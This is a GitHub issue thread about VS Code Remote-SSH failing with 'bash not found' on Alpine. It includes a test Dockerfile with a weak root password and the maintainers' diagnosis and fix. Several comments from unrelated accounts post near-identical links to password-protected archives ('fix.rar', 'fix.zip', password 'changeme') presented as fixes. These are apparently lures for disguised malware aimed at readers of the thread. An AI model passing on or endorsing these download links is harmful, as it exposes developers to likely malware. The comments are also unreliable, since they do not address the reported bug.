### ISSUE TITLE
"bash not found" Connecting to SSH on Alpine

### ISSUE THREAD

**Issue by chrmarti** [microsoft/vscode#226753]
Testing #226689

Remote - SSH
v0.114.2024082315

Using one window to run a devcontainer:

```json
{
	"dockerFile": "Dockerfile",
	"appPort": 1234,
	"overrideCommand": false
}
```

```Dockerfile
FROM alpine:latest

RUN apk update && apk add openssh libstdc++

RUN sed -i 's/#PermitRootLogin prohibit-password/PermitRootLogin yes/' /etc/ssh/sshd_config
RUN sed -i 's/AllowTcpForwarding no/AllowTcpForwarding yes/' /etc/ssh/sshd_config

RUN ssh-keygen -A

RUN echo "root:foobar" | chpasswd

EXPOSE 1234
CMD ["/usr/sbin/sshd", "-D", "-p", "1234"]
```

Then connecting to the ssh server: `root@localhost:1234`

![Image](https://github.com/user-attachments/assets/4f969606-b715-44b6-91fd-cf3bfef1604f)

**Comment by chrmarti** [comment]
Also on Windows:
![Image](https://github.com/user-attachments/assets/399af631-4b73-4c7e-8980-a3927375f4c5)

**Comment by Fariz86** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by miniMuggle** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by joshspicer** [comment]
Apologies @chrmarti, I don't think the pre-release version with the relevant change was released yet when you created this issue. That explains the `bash not found` error, which is expected up until `v0.114.2024082715`.

That said, i'm still able to repro _some later_ issue with your dev container example above.  I'll look into that and report back.

**Comment by joshspicer** [comment]
I think my hunch was right.  

I've confirmed that my specific alpine VM that i've been testing with still works with `v0.114.2024082715` when using the default ssh port (port 22).

I then tried again changing the ssh server port to something else (3001), and got stuck in the same spot  as my test against your dev container example.

![Image](https://github.com/user-attachments/assets/e3606ec4-7e8e-48f7-8f7e-4d69f08f354b)


Traditionally the scp codepath is not as exercised, but in this instance it is.  Thanks for the repo steps, i'll take a look at fixing scp.

If you're able to test targetting port 22 please let me know how it goes, otherwise i'll look into fixing the scp path and then ask for a re-test 👍

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by chrmarti** [comment]
Works for me with the latest version and port 22 on macOS. Waiting for my devbox to become available again to retest on Windows.

**Comment by joshspicer** [comment]
Thank you for re-testing.  I see now why this is happening on Windows.  By default Windows does not use 'local server' mode, causing it to send an ssh command with a hardcoded `bash`. This would also repro if a user disabled "useLocalServer" mode on their mac or linux machine (though that would need to be done explicitly)

**Comment by joshspicer** [comment]
Pre-release published that should resolve this


https://github.com/user-attachments/assets/29edddbc-0569-4da7-890a-fb0643db6e7e
